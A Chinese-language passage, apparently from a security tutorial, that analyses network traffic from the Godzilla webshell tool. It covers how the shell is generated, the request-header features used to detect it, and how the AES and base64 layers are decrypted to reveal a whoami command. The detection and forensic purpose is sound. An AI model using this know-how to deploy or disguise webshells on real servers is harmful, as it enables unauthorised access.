再AES加密所以对应的解密流程为先AES解密得知道密钥再进行base64解码应该是执行的whoami命令解密第三组请求包解密之后就可以看到攻击特征了哥斯拉流量分析哥斯拉是⼀款优秀的权限管理⼯具内置了3种Payload以及6种加密器6种⽀持脚本后缀20个内置插件。PHP_EVAL_XOR_BASE64生成webshell文件其实就是生成了一个一句话木马添加webshell连接ip.dst 192.168.1.6http过滤出数据包追踪数据流还是有三组请求响应包仔细看请求包的请求头发现它有以下特征1.Accept 请求体和冰蝎类似 有text/html,application/xhtmlxml 这个可以当作是个弱特征因为请求头是可以修改的2.Cookie请求头最后会有个;分号 这是之前webshell工具所没有的特征知道连接密钥和密码后如何解密出数据包内容呢?手工解密还是有点复杂的哥斯拉的加密流程一般是AES加密-base64编码-传输时可能会被url编码解密流程先base64解码再AES解密手工解密1.先把请求体做一个url的解码解码出pass和key字段2.对于key字段先进行base64解码 注意要设置Hex 16进制才能解出来3.进行AES解密算了有点麻烦直接用工具解密吧工具解码1.直接上工具工具地址https://github.com/nocultrue/Deco_Godzilla设置好对应的加密器 解码key中的数据工具地址执行的是一个whoami命令解密响应包